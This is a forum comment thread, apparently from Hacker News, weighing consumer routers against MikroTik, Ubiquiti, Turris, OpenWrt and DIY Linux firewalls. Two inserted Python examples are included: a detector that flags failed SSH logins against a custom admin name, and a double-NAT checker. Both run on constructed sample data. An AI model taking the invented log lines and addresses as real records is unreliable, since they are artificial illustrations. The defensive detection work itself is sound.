Also you can run Freetz, a way to extend (not replace) the router software. It has enabled me to run mDNS for split DHCP.
second this - get a Fritzbox whenever possible. Stable, very long updates (even newer features) and easy to use. They seem pricy, but longevity will make up for that.
The majority of the points tend to be based on the facts that the firmware is shit, isn't updated for long, and visibility into the firmware and its releases is murky and opaque.
So what if you wipe out the firmware and go for openwrt? how does balancing for compatibility with openwrt and consumer router hardware rank on this scale?
OpenWRT support does not come free. There are volunteers that need to spend lots of their personal time so that a consumer router may get reasonably good support in OpenWRT.
Whole range of chipsets with no free software support are immediately excluded from OpenWRT.
> Whole range of chipsets with no free software support are immediately excluded from OpenWRT.
True, but it reminds me of where printer support used to be in Linux, say, 20 years ago: Lots of shitty printers weren't supported. Sometimes, yeah, that's a deal-breaker, but if you're in a position where you can buy one, plenty of good hardware is fully supported.
GPUs are a much better analogy than printers. Broadcom WiFi occupies the same status as Nvidia GPUs: #1 in the market, hostile to open source, but their main competitors work fine on Linux without the hassle of closed-source driver blobs.
It surprises me how many otherwise experienced system administrators consider a home router something you have to buy and get a completely unsuitable plastic throwaway gadget. It’s an internet-connected device, therefore you have to treat it like any other server¹. Get a computer, stick a wifi card in it, install your favorite Linux distro, configure the networking (including DNS resolver, DHCP daemon, hostapd, firewall rules, etc.). Keep it updated in whatever way you keep all your other servers updated. Done.
Normal consumer routers are bad for the same reason that just about all IoT devices are bad. This will not change unless the incentives involved change; i.e. don’t hold your breath.
What are people’s thoughts about the Turris Omnia[0]?
Does it hold up to their claims and is it playing nice with American ISPs like charter?
I like the hardware but I don't like the default software that's on it. NIC.CZ is already spread too thin and I get the feeling that they are not prioritizing their router branch on the level it should be.
I'm considering running Alpine on it but so far that's pretty much uncharted territory.
I have a Turris Omnia. I have no real complaints. It is way better than any other router I've owned. It is the only one I've felt comfortable to do anything fancy with.
I currently have mumble and a nextcloud server running on the router, and a wireguard interface.
I can't comment on any US ISP weirdness as I live in Europe.
Great to hear! I love the ability to swap out wifi cards or even insert a WAN module. Great if wifi cannot be trusted as a fallback.
I own Turris Omnia from 2019, it works flawlessly, recently added LTE card for backup connectivity.
My stock Debian x86 mini-ITX firewall is now 7 years old. It has been upgraded across three stable releases and will go to bullseye sometime this year. It handles stateful firewalling, IPv6 routing, failover DHCP, DNS caching, NTP... and it has lots of available capacity in CPU and RAM.
It was expensive for a home firewall but not horribly so, and I fully expect it to have a ten or twelve year lifespan with full support. If the NIC fails, I can replace it -- it's a PCIe card. If the storage fails, I can replace it -- SATA SSD. Neither of those have happened yet, but I might replace a fan sometime soon.
These days I would probably buy a tiny NUC-like object with enough gig-e ports.
I've often thought about doing something like this over the years...but the enthusiasm (if that's the right thing that i feel) often wears away, when i'm just sitting down after a very long, hard day of work to watch netflix...and then "the internet is down". Clearly i have no experience doing what you described, and my fear of added maintenance might be inaccurate...but i do wonder if this is better in the long run. Do you find that such an approach creates lots more maintenance work for you?
If you are not doing anything fancy with your current router, using debian on an x86 machine as a router will work indefinitely. All you'll ever do is apt update.
Nice; ok thanks!
I've been running similar setups for the past 20 years or so. It's as much maintenance as you want it to be after initial configuration.
That's a long time; thanks!
sure. i am now on 4th iteration of gateway (setting it up now). first one died (early 2000s.) second couldn't deal with 120mbit adsl speed. third had 2 mini-pcie cards inside to serve as AP. for past couple of years tried edgerouter-x flashed with openwrt, but it was... "not it" (selection of packages is vast, yet limited) so i went back to x86 based one. one interesting side effect, is that much talked about bufferbloat disappeared after i switched to it from edgerouter, even without any queue management (have 1gb cable at home).
Debian has no bugs - heard it here first!
MikroTik hAP ac2 (RBD52G-5HacD2HnD-TC) - all you need and then some for fair price.
MikroTik hardware is nice but that company has a serious case of NIH syndrome. This manifests as a lot of cryptic, undocumented commands plus the occasional showstopper exploit (eg https://nvd.nist.gov/vuln/detail/CVE-2020-13118). As an added benefit, they have a cult of online followers who are all too happy to deride anyone who points these (and other) flaws out as a clueless nontechnical moron. Fwiw I'm transmitting this through one of their routers.
That CVE is for third party software. But this brings up a good point. It has a good API surface you can plug into in many ways.
There have been some CVEs, but all the exploits I'm aware of already had patches and were only exploitable for un-updated models.
I honestly don't know what you mean by not invented here. They did create a wireless protocol for point-to-point products with some advantages for those who opt into it, but that's the only thing I can think of.
Sometimes their documentation is lacking, but generally their docs are very good.
Is Mikrotik Router Monitoring System an actual MikroTik software, or is third party open source project? Doesn't seem to be provided by MikroTik: https://github.com/adeoluwa-adebiyi/Mikrotik-Router-Monitori...
Still using the hAP ac that I ordered 5 years ago and it works great. After some time I needed more ports, so I added Mikrotik switch in the mix that gets powered by hAP ac PoE out port. Great hardware and great software at low prices.
That one is 2x2 so you're not getting a lot of bandwidth or range.
The majority of client devices are 2x2 or even 1x1, so for most setups it won't make much of a difference, if any at all.
If you need a more advanced AP, you probably shouldn't be looking at all-in-one devices. Buy separate components, add as many APs as you need for proper coverage, rather than relying on a single device to cover everything.
Absolutely this. I put the "Super"hub I got from Virgin Media in modem mode immediately and installed an ac2, and the experience has been lovely.
I am loving my Edgerouter 4 + Unifi APs. Home network is rock solid. If only I could figure out why my ISP is dropping 20% of packets to Cloudflare DNS.
Not sure about your ISP, but CenturyLink for me seems to have something against 1.1.1.1, but not 1.0.0.1 though.
CenturyLink uses Calix GigaCenter routers which have an embedded http server at 1.1.1.1. Cloudflare calls them out here: https://blog.cloudflare.com/fixing-reachability-to-1-1-1-1-g...
I am on WOW. It seems like the connection to Chicago is the problem and that is where most of my traffic goes (I am in Detroit) but requests to MSP are fine. I notice similar issues when loading images via the ORD datacenter.
Cloudflare has been having some weird issues with Chicago lately. I had to outright ditch them recently and switch to OpenDNS because my internet would just stop working due to their DNS failing.
Huh, that’s a helpful datapoint. I figured it was just WOW customers because we have been having frequent outages recently. I am on Level3 now since after running some benchmarks it appears to be the fastest for me.
Anyone consider the Odroid H2+? It's a relatively fast CPU (for a router), the Intel J4115, relatively low power (10 watt TDP), max RAM 32GB (plenty for a router), has two 2.5 Gbit ports, with an option to add 4x2.5 Gbit for $47. Also has an eMMC and M.2 slot for reliable storage, to avoid any ugly USB connected storage for boot.
Seems like it would make a quiet and fast 6 port x 2.5 Gbit router and run well with Linux based OS, unsure of the state of drivers for *bsd.
I did see a thread about getting it to work well with OpenWRT.
Ok I get it.... any recommendations for acceptable routers?
When this article says "router" it means "combination router and wireless access point". Which is fine—that's how most people think of these products—but they are available separately.
For my home, using Ubiquiti products has worked well. I have the EdgeRouter Lite and UAP-AC-PRO access points which support POE. It's been nice using products designed for professionals, and it's nice to be able to administer and upgrade the router independently from the access point. These products just work, and there's none of this dodgy "reboot the router" nonsense.
I hear a lot of good things about the many mesh networking setups (often combined routers/APs) now on the market but haven't tried any. They're almost certainly a better fit for a consumer who doesn't want to be a network admin. Ubiquiti has one (the "Alien"), and the Eero (now owned by Amazon) is often recommended.
I recently rebuilt my home network when switching ISPs and fell in love with Ubiquiti. It's the first time I have ever been happy to use networking-related hardware. Dealing with Asus/Linksys/Netgear/etc in the past had always been a miserable experience, and I'd cringe every time my internet went out and was forced to deal with them again.
It's a shame that there aren't more "pro-sumer" products like this out there. A common warning I read when researching Ubiquiti products was that they're not for people who aren't tech/networking professionals. I don't know where that came from, because setting it all up was a breeze. It was way easier than dealing with Asus's terrible "setup wizard".
>"It's a shame that there aren't more "pro-sumer" products like this out there"
Mikrotik is another company that has a good pro-sumer to pro ecosystem. Routers, APs, adapters, long-range point-to-point radio stuff. Most of their gear runs on variations of their RouterBOARD hardware and Linux-based RouterOS, and can be collectively managed through CAPsMAN, which can either run on one of their routers or on a desktop PC.
The configuration side is definitely less slick than what you get with Unifi, on the other hand you can configure everything in detail. You get an astounding amount of possibilities for your money, if you can accept the late-90s/early-2000s style web interface or just use the terminal interface instead.
The only thing I've found lacking is that they don't have any 4x4 or 802.11ax access points yet, but if you go modular (separate router, switch and AP), you can upgrade piecemeal when you need to.
> A common warning I read when researching Ubiquiti products was that they're not for people who aren't tech/networking professionals.
There's still a lot of weirdness in Ubiquiti, even in their UniFi line, that'll throw the average user, but it's definitely a lot more user friendly than the EdgeMax line. I often find UniFi tries to be so friendly that it ends up making things harder. I had an auto-discovery issue that I spent a lot of time troubleshooting, mostly because I can't just tell it "this device with this MAC address is here now", it has to find it for itself.
The UDMP does a really good job just being "the central core of your network you plug stuff into", but it's also confusing because it has the device firmware itself and then the software for each function on it, including the firewall software, which is all very convoluted.
I have an EdgeRouter ER-8 (acquired secondhand; I do not need 8 router ports for my home network) and have been considering upgrading to an EdgeRouter ER-4 (fewer ports; much better throughput) because the ER-8 is actually a bottleneck on my 600Mbps cable uplink. The ER Lite is even worse and doesn't seem to be well suited to modern Internet speeds.
The EdgeRouter OS is essentially a Debian build and can run openconnect and other VPN software if you need something that is not included in the base install.
I would recommend the ERs to anyone with a bit of networking skill.
> The ER Lite is even worse and doesn't seem to be well suited to modern Internet speeds.
What are you doing to it? Mine ran at 950 down, 450 up just fine. Are you going faster?
I've got a UniFi Dream Machine Pro and a UAP-AC-PRO, and it's everything I could ever need or want in a home network. I had an EdgeRouter X before the UDM Pro, which was also very nice but definitely lacked a lot of polish and also just couldn't provide the full speed of my Internet connection (600 Mbps).
My parents have Eero, and it's definitely a really nice system that Just Works. Exactly as you described it, perfect for a consumer that wants quality without having to be a network admin.
The author of the article has some suggestions here:
https://www.michaelhorowitz.com/second.router.for.wfh.php
and here:
Many of the items on the checklist are questionable. eg.
>Can the wireless network(s) be scheduled to turn off at night and then back on in the morning?
This seems almost tin-foil hat level security. Nobody is wardriving at 3am and hacking into your wifi.
>Is it limited to one logon at a time? It should be. The router should not allow multiple computers to logon at the same time using the same userid.
How does this improve security? I guess you can use it to catch an attacker on the rare chance that they get access at the same time you're on the admin page, but that's not really worth considering.
>Can the userid for the web interface be changed? Every router lets you change the password, a few let you also change the userid. This is most important when using Remote Administration. An October 2016 study of 12,000 home routers by ESET found that "admin" was the userid "in most cases."
What's wrong with "admin" with a secure password?
I work on a product that allows "one user at a time". It's not a security issue, it's a "don't want to maintain a multi-user database for extremely small benefit" issue. There's no good reason to have multiple folks futzing with this thing's configuration, just like there's no good reason to have multiple folks futzing on your router. Most of the time my product or your router sits in an out-of-the-way place gathering dust; multi-user access is a laughably infrequent use case.
Now why the author calls this out is anyone's guess. Sometimes someone sees a product like what I work on, sees single-user, assumes "aha! Better security!" No, we're just lazy. If there's any additional security, that's gravy and not a design decision.
I agree that the author seems over the top.
I do think "one logon at a time" might be a good idea, just not for security reasons. I suspect these routers don't do well with concurrent updates.
Changing the admin id would have the benefit of culling out noise. An unsuccessful login attempt to "myuniqueadmin" catches your attention as something meaningful.
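The signal-versus-noise point in the comment above, as an added detection example (not code from the thread, the article or any router vendor): failed logins against the default names that every internet scanner tries are background noise to be counted, while a failed login against a custom admin userid that nobody should know is worth an alert. The log lines are constructed in OpenSSH's "Failed password" format using TEST-NET addresses; real router firmwares vary in their log format, so the regex is the part you would adapt. The home LAN range and the userid "myuniqueadmin" are assumptions taken from the comment.

```python
"""Classify failed router logins by whether they target the real admin userid.

Added example; the sample log, LAN range and admin name are constructed.
"""
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Constructed sample log (OpenSSH-style messages as a router running sshd might emit).
SAMPLE_LOG = """\
May  3 02:11:04 router sshd[2201]: Failed password for admin from 198.51.100.23 port 50122 ssh2
May  3 02:11:06 router sshd[2201]: Failed password for admin from 198.51.100.23 port 50123 ssh2
May  3 02:11:09 router sshd[2203]: Failed password for root from 198.51.100.23 port 50125 ssh2
May  3 02:12:41 router sshd[2210]: Failed password for invalid user pi from 203.0.113.9 port 41000 ssh2
May  3 02:15:17 router sshd[2218]: Failed password for myuniqueadmin from 203.0.113.9 port 41012 ssh2
May  3 08:30:55 router sshd[2305]: Accepted publickey for myuniqueadmin from 192.168.1.20 port 52210 ssh2
May  3 08:31:02 router sshd[2307]: Failed password for myuniqueadmin from 192.168.1.20 port 52214 ssh2
"""

# Matches only failed password attempts; "invalid user" is optional so that
# guesses of non-existent accounts are captured too.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+"
)

LAN = ip_network("192.168.1.0/24")  # constructed home LAN


def classify_failed_logins(log_text, real_admin, lan=LAN):
    """Split failed logins into alerts (real admin name) and noise (everything else).

    Returns (alerts, noise). Each alert is a dict with user, src and severity:
    "high" when the source is outside the LAN (someone outside knows the name),
    "medium" when it is inside (more likely a household member mistyping).
    Noise entries are (user, src) tuples for the default-name guessing that
    any internet-facing service sees.
    """
    alerts, noise = [], []
    for m in FAILED_RE.finditer(log_text):
        user, src = m["user"], m["src"]
        if user != real_admin:
            noise.append((user, src))
            continue
        severity = "medium" if ip_address(src) in lan else "high"
        alerts.append({"user": user, "src": src, "severity": severity})
    return alerts, noise


def noise_by_source(noise):
    """Count default-name guesses per source address (spots brute-force sources)."""
    return Counter(src for _, src in noise)


if __name__ == "__main__":
    alerts, noise = classify_failed_logins(SAMPLE_LOG, "myuniqueadmin")
    for a in alerts:
        print(f"ALERT [{a['severity']}] failed login as {a['user']} from {a['src']}")
    for src, n in noise_by_source(noise).most_common():
        print(f"noise: {n} default-name guesses from {src}")
```

With the default userid left as "admin", the first three lines would be indistinguishable from the attempt that matters; renaming the account is what lets the fifth line stand out.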
These three are recommended in the security checklist [0]:
* Pepwave Surf SOHO
* Amped Wireless RTA1750
* Synology RT1900ac
[0] https://routersecurity.org/checklist.php
Slap Linux on an old desktop, buy a 4 port PCI NIC, set up nftables/dnsmasq, and as a bonus become addicted to self hosting.
That replaces a 5-10W device with a 100W device. I wouldn't want that, that's 566 kg of extra CO2 per year with the US power mix.
I think you can swap "old desktop" for some smaller new power efficient mini desktop, which at idle (for basic home needs, let's face it, it's pretty close to idle) is likely to draw way under its max... but if you are so carbon conscious, consider the total environmental cost: buying new shit (new mini desktop or consumer routers) that constantly needs replacing incurs a carbon cost through consumption that people rarely try to quantify because it's not so easy - but it's often still very big. Saving an old PC from the rubbish is free of this cost; it not only saves manufacturing carbon cost but environmental pollution.
On eBay you can find Dell R210 II with Ivy Bridge CPU for 150 USD. These idle at 25 watts, and are super quiet and small. I have not tested the R220 with Haswell, but I guess idle usage is less than 20 watts as Haswell had much improved power efficiency when idling.
1 Watt continuous is $1 per year, as a typical USA rule of thumb (at $0.12 per kWh). Places like California are a lot more expensive.
So yeah, it's pretty expensive on an ongoing basis to convert an old desktop to a router.
I must confess, I run an OpenBSD firewall on an old Dell server. Fortunately the Intel CPU doesn't need to do much. So I'm only drawing about 70 W continuous. I keep meaning to replace it with something more power efficient but haven't.
I've had good success with Ubiquiti EdgeRouters
I started thinking this route. 12 months and $2000 later I ended up with a 15U rack in my basement, Ethernet drops in most of my rooms, wifi that blankets my home and yard, 4K security cameras, and more. Contrary to what you might read from a vocal minority on Reddit, my UDM-PRO has been solid. It was a great investment for the work from home era.
Not saying it wasn’t worth it - it’s a huge step up in reliability from what I had, but I kinda feel like an EdgeRouter is a gateway into the wider Ubiquiti ecosystem.
I currently have Ubiquiti gear, bought about five years ago, and my APs are already EOL for a couple of years. They don't seem like a great choice for medium-term or long-term installations for this reason. They also don't seem to publish EOL or support timelines, or commit to supporting equipment for any term (as far as I can find - I'd love to see a support schedule if anyone knows it).
On the flip side, the UAP-AC-PRO access point that I bought 5+ years ago is still supported and receiving updates to this day. And that's the case for the majority of their access points.
Glancing at their documentation, it seems that they've only EOLed the three early 802.11ac access points they released. Of course that doesn't help you or make your concern any less valid, but it's not like they're in the business of just willy-nilly cutting off support for their products. The one you bought just happened to fall into an unfortunate minority.
I agree, but they don't seem to release any information about how long a product will be supported. I could upgrade today and find the product EOL'd tomorrow.
Yep, that's definitely a valid criticism.
PCEngines APU for DIY, or Mikrotik for a provided solution. If you need more ports or throughput, extend with a dedicated switch. Any stupid unmanaged switch is good enough for most SOHO use-cases, unless you want to get serious with segmenting your network with VLANs and ACLs.
As for what DIY OS/dist, I have used VyOS, IPFire, pfSense, OPNSense, and a handful of various xx-WRT derivatives. OpenWrt is still my recommendation without a doubt. I'm still not at all a fan of the update and package management of OpenWRT, but it's the best out there unless you configure a vanilla debian install yourself.
Keep WiFi APs as separate devices, regardless of if you mesh or not.
For fun, I'd make my own with a low-power Linux/BSD box (Atom or ARM-based). I guess performance would be totally acceptable compared to consumer-grade routers (do we need ASIC-based routing at home anyway?)
For the full consumer router experience you should run it inside qemu-system-mips. Then it should also match up performance wise.
Of course it wouldn't be complete without hacking up your own, custom Linux system calls[1], or hacking up SquashFS to be big-endian for no reason and storing your own data structures in the compressor options[2].
[1] https://twitter.com/RichFelker/status/1357733309737021444
Turris?
You can also use this as plausible deniability when you get raided by the police and they discover your collection of pirated music.
Another positive note here for Mikrotik - $50 USD buys you the hAP ac lite - enough for a "home" router but with all the features of top end enterprise routers.
Other comments have addressed security concerns - there's lots of CVEs out there because there's lots of Mikrotiks out there. As far as I'm aware, all or nearly all CVEs are patched before they are public; there's always the risk of zerodays but everything has the risk of zerodays.
I would go for the hAP AC or AC2, rather than the lite versions, which are specifically the low end of the range and can only route ~500Mbps and don't have 5GHz wireless.
The difference in price isn't even that much, the AC2 is less than $70.
This is good advice for a "one device does it all" setup.
My personal setup is actually running the hAP ac lites as access points, via CAPsMAN. I do routing on a hEX Gr3. The hAP ac lites are great value for a dual-radio 2.4/5 GHz AP.
I also have an all-Mikrotik passive PoE setup, so it's one lead to the ac lites. Similar featureset to Ubnt, Cisco, others, at a fraction of the price.
The state of all network firewalls/routers is appalling. Even high end Cisco, Fortinet, or even Palo Alto gear is riddled with security issues, critically outdated packages, and general poor maintenance.
IMO, the only way to have a reasonably secure device is to build it yourself. That's not going to be a popular opinion where the prevailing motto is "nobody gets fired for buying Cisco", but I don't really see any alternative. OpenWRT/Tomato are decent, but they still expose a web UI which is potentially a greater attack surface than ssh w/ public keys.
I've seen some people have good results with OpenBSD or FreeBSD, others with skinny versions of Debian or CentOS. I took a crack at it last year on Debian (shameless plug: https://nbailey.ca/post/linux-firewall-ids/), and I've been happy with it so far. It is more expensive to build, but I expect this device to last more than a decade, or until I need greater than 1gbps per port.
Just uninstall the openWrt web UI then.
or configure uhttpd to only listen on localhost and use an ssh proxy tunnel to access the web interface. It saves you from the hassle of self signed certs too.
Well, if you build it yourself at least you’ll think it’s secure!
About a year ago I decided no more crappy plastic boxes as my main home router, and now use a headless Linux PC instead. No regrets and have plenty of resources to run things like ntopng and anything I need right at the edge of my home network; and QoS is something I can control as well.
I don't care about the small increase in cost of electricity where I'm at.
Now I do also have an Asus RT-AC56U but configured for an access point only. Which had pretty decent firmware IMHO with its OpenWRT variant "AsusWRT"--decent because it's easy to get root without flashing it and really do what you want. With all the cloud service stuff disabled, it goes into a 2nd NIC into my PC-as-a-router and is appropriately firewalled.
At least one other comment talks about getting business class hardware for Wifi and that might be a plan in the near future, but for now it's working OK for me.
Agree as OpenWrt user.
> "Linksys is by no means alone in using its customers as beta testers
Not sure, but my Linksys router starts painfully slow and is kinda 10x faster on OpenWrt. Crazy slow for a dual-core machine. Maybe it's part of their plan to force clients to buy new routers?
If I disable wifi on the shitty router my ISP gave me, and assuming the physical device is secure, am I safe from having my home network hacked into?
I assume the ISP could still backdoor their way in (is this likely?) but that is a separate concern.
This depends completely on what you put AFTER the router that your ISP gave you. You can often get your ISP to put the router into Gateway mode which turns off the routing part and the wifi. It becomes just a modem at that point, and you can use whatever good router you want.
Yes some are really atrocious, D-Link comes to mind. Some are better, the high end gaming routers by Asus actually have good support but just like phones they have a limited shelf life...
One thing I tried to find but couldn't is standalone modems; most routers today don't come with a modem and you have to use the shitty one given to you by your ISP in bridge mode. I'm not sure about the risk of a compromised bridge-mode router infecting the router downstream, given it's "secured", but it can still be a bot in a botnet.
Okay cool but....
I'm still just plugging these supposedly awesome routers into bargain bin, un-updated, garbage quality, broken, insecure, spying cable modems provided by or "compatible with/verified for" my internet service.
So what if my router is secured? My connection is still beholden to whatever garbage software written in 2008 my damn DOCSIS 3.0 compliant box has, with all the unfixed bugs and performance issues that entails.
Are there any cable modem/routers that can be customized? Have openWRT or similar installed? Or are otherwise pretty good?
Wait until you hear where the bytes go when they leave your house...
Assume the physical network is insecure. The only exceptions might be secure backplane networks carefully configured and isolated, but these are basically data buses for clustered computing.
I was in the market for a home router a couple of months ago and I was astonished that 200-300 euro is now considered "mid-range" for a wireless router.
That's the gamer tax in effect. Sci-fi looking hardware with wild claims about bandwidth and latency for ultimate gaming performance lets them charge a premium.
I can't tell - is that more or less than you expected?
My favorite solution is a thin-client class computer with opnSense, and a Ubiquiti Wifi Access Point.
I have used a Ubiquiti router, but find opnSense easier to use.
I got an Arris SURFboard SBG7600AC2 a couple of months before the pandemic hit. Don't know about the security but the device itself has been rock-solid. Here I am 14 months later without any complaints. Four people are working remotely on it, numerous mobile devices are connected and some are streaming - it's never broken a sweat.
If anyone knows of a security issue I'd love to hear about it.
I like the Juniper SRX series, BSD-based and find the configuration syntax (mostly) very logical. But, no WiFi (I use Ubiquiti for that).
very solid as well.
mind you even a basic srx is complete overkill for a home environment. it is very solid hardware with good support. I would however, not recommend getting one for home use unless your employer runs juniper and can get you the update packages, getting them without a license is difficult.
I have recently bought a Mikrotik RB4011 for my home. It was a bit pricey, but I love the feeling of control I got when I set it up. The model with built-in WiFi had very poor coverage, so I exchanged it for a model without wifi as that one can be mounted into a rack, and now I will use my old consumer router in bridge mode as an access point.
The recommended Pepwave Surf SOHO has multi-WAN support, including Wi-Fi and cellular, which is one of the reasons I went with it (along with robust VLAN support). I've yet to find a way to bridge/route everything I want from my main VLAN to my IoT VLAN while isolating everything else appropriately.
Unfortunately, mine has intermittent radio timeout issues (or something more obscure that I can't diagnose, like frequency-hopping induced congestion), where I have to log into the router and force a rescan of the airwaves for it to re-establish the connection to the upstream WAN Wi-Fi. It's also lately been having issues with the 2.4 GHz network dropping out (I may eventually dig up my old WRT54GL with Tomato on it to run the 2.4 GHz separately).
I have had a NanoPi R2S with OpenWrt for almost a year. It's an ARM device, so it uses very little power. One of its two gigabit ports is converted from USB 3. It works well with a 500 Mbps downlink. There is a newer model (R4S) with a PCIe-based gigabit port.
Consumer electronics are pretty much all bad. Usually the software devices are shipped with is poorly designed at best (it needs to look nice to sell, ergonomics don't matter) and pathologically user hostile at worst (smartphones and PCs).
Does the AmpliFi fit into this category? I got an Instant a while back and while it's not super tweakable, it's been incredibly stable and easy to use.
How exactly would I go about avoiding consumer routers when every provider in my area forces me to get some kind of modem with built in router and wifi?
You can treat the ISP's router as bare, hostile internet and put the router of your choice behind it. Disable their Wi-Fi if you can, but don't use it. Plug an ethernet cable from your router's WAN port to one of the ISP router's LAN ports. Your router's WAN side will get one DHCP address from the ISP's router. Your LAN side and firewall rules are however you like them, on your router. This whole thing is called "double NAT-ing" -- search for that term for a how-to guide.
A lot of ISP routers have the option to disable everything except the modem, often called "bridge mode". Avoids double NAT.
You can also call your ISP to put the modem-router in bridge mode. This will basically turn off all of its features and just have it pipe internet access from its LAN ports. If you do this, remember to go ISP router LAN port > personal router WAN port, as you won't be protected by the ISP router firewall anymore.
Good suggestions. Thank you. I have done something similar before. The only problem is, I had to revert the setup each time the ISP had hiccups, otherwise they refused to provide any support.
I haven't done any research, but my set of anecdata (3 Internet providers from Romania, 2 national and one regional) says that providers do have ways of bypassing their router at Layer 3. These ways are not advertised, sometimes not even documented. But they should be just a phone call away.
If the router is also used as a media converter (upstream is fiber or DSL or coax), they should be able to set it to "bridging mode", where it will function as a Layer 2 device (switch), thus allowing the customer to use their own Layer 3 device (router).
Most of the time you can set them to bridging mode from the management interface as well.
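The replies above describe two setups behind an ISP box: double NAT (your router's WAN port gets a private DHCP lease from the ISP router) and bridge mode (your router gets the real upstream address). A quick way to confirm which one you actually ended up with is to look at the address on your router's WAN interface. The script below is an added example, not code from anyone in this thread: it parses a constructed `ip -4 -o addr show` capture (the WAN interface name `eth0` and the addresses in it are assumed sample data), classifies the WAN address as RFC 1918 (double NAT), RFC 6598 carrier-grade NAT (ISP-side NAT that bridge mode on your own box cannot remove), link-local (no lease at all), or public, and returns a verdict with the corresponding next step.

```python
import ipaddress
import re

# Address ranges that are never globally routed. Seeing one of them on the
# WAN side of your own router means the device upstream of it is doing NAT.
PRIVATE = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
CGNAT = ipaddress.ip_network("100.64.0.0/10")        # RFC 6598 shared address space
LINK_LOCAL = ipaddress.ip_network("169.254.0.0/16")  # self-assigned: no DHCP lease obtained

# Constructed sample of `ip -4 -o addr show` on a small router (assumed data,
# not a real capture). eth0 is the WAN side, eth1 the LAN side.
SAMPLE_IP_OUTPUT = """\
1: lo    inet 127.0.0.1/8 scope host lo\\       valid_lft forever preferred_lft forever
2: eth0    inet 192.168.100.12/24 brd 192.168.100.255 scope global dynamic eth0\\       valid_lft 86234sec preferred_lft 86234sec
3: eth1    inet 10.0.0.1/24 brd 10.0.0.255 scope global eth1\\       valid_lft forever preferred_lft forever
"""

# One-line-per-address format produced by `ip -o`: "<idx>: <iface> inet <addr>/<plen> ..."
IP_ADDR_LINE = re.compile(r"^\d+:\s+(?P<iface>\S+)\s+inet\s+(?P<addr>[\d.]+)/(?P<plen>\d+)")

ADVICE = {
    "double-nat": "upstream ISP box is still routing/NATing; put it in bridge mode or keep double NAT",
    "cgnat": "address is carrier-grade NAT; the ISP NATs upstream, bridge mode on your box will not change that",
    "no-lease": "link-local address: the WAN port got no DHCP lease, check cabling and the ISP box's LAN/DHCP",
    "public": "WAN holds a public address: the ISP box is bridged or is a plain modem, single NAT",
    "reserved": "address is in a reserved range; check the upstream device's configuration",
    "invalid": "not a valid IPv4 address",
    "no-address": "WAN interface has no IPv4 address at all",
}


def classify_wan_address(addr: str) -> str:
    """Map an IPv4 WAN address to what it implies about the upstream hop."""
    try:
        ip = ipaddress.IPv4Address(addr)
    except ipaddress.AddressValueError:
        return "invalid"
    if ip in LINK_LOCAL:
        return "no-lease"
    if any(ip in net for net in PRIVATE):
        return "double-nat"
    if ip in CGNAT:
        return "cgnat"
    if ip.is_global:
        return "public"
    return "reserved"


def wan_address_from_ip_output(output: str, wan_iface: str):
    """Extract the IPv4 address of wan_iface from `ip -4 -o addr show` text, or None."""
    for line in output.splitlines():
        m = IP_ADDR_LINE.match(line.strip())
        if m and m.group("iface") == wan_iface:
            return m.group("addr")
    return None


def diagnose(ip_output: str, wan_iface: str) -> dict:
    """Combine parsing and classification into a single verdict for the WAN port."""
    addr = wan_address_from_ip_output(ip_output, wan_iface)
    verdict = "no-address" if addr is None else classify_wan_address(addr)
    return {"wan_iface": wan_iface, "wan_addr": addr, "verdict": verdict, "advice": ADVICE[verdict]}


if __name__ == "__main__":
    # On a real box you would feed in the output of `ip -4 -o addr show` instead.
    result = diagnose(SAMPLE_IP_OUTPUT, "eth0")
    print(f"{result['wan_iface']} = {result['wan_addr']}: {result['verdict']} ({result['advice']})")
```

The sample capture shows a `192.168.100.x` lease on the WAN port, so the verdict is double NAT, which is exactly what the first reply's cable-from-WAN-to-LAN setup produces; after switching the ISP box to bridge mode, rerunning the same check should report a public (or CGNAT) address instead.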
It is a ridiculous situation, but I actually have our provider-provided router connected straight into a real firewall, and that in turn connected to a switch which in turn has the wifi base stations connected to it.
This means that if the first router is compromised there is a chance it won't penetrate the household, but of course the first router could still be used e.g. as part of a botnet by an attacker.
OpenBSD on a PC Engines APU2 is a good choice for those that would like to enjoy setting up a firewall with PF on low power consuming hardware.
Used to be easier in the DSL days. Hardware was easy to find. Then my ISP switched to VDSL and it became almost impossible to find better routers. Now I have a fiber link and the ISP's router is so bad but I don't really know if I can just buy a better one and connect the fiber to it. I've been told ISPs have remote access to the router and can update it remotely and deny access if it's been tampered with.
It's probably a wise decision to avoid consumer products in general but it's becoming harder every year.
Does your ISP router have DMZ hosting, where you can forward all packets at layer 2 or 3 to your own router behind it?
What would be the advantage of that? Unless your "own router" is basically VPNing everything past the ISP router? In which case it's not really clear why you need the "own router" part...
There are plenty of VDSL modems which can be interfaced with a router of your choice.
I couldn't find any years ago. Perhaps the situation has improved by now.
I wish there were cable modems available as PCIe expansion cards with OSS drivers so I could roll all my own home networking gear.
Every critique in this list could be levelled at networking equipment that costs thousands or tens of thousands of dollars.
Curious why nobody mentioned Turris series - they provide consumer routers with OpenWRT, and with upgrades.
Apple, you are missed in this space.
Avoid consumer laptops too
He's gonna have to pry my Fritz!Box from my cold dead hands.
What's the tl;dr?
Buy any router, but replace its software with dd-wrt or openwrt?
Not exactly. It's worth the read, it's about 7 min. :)
I like this little thing: https://shop.netgate.com/products/1100-pfsense
Nice little pfsense box.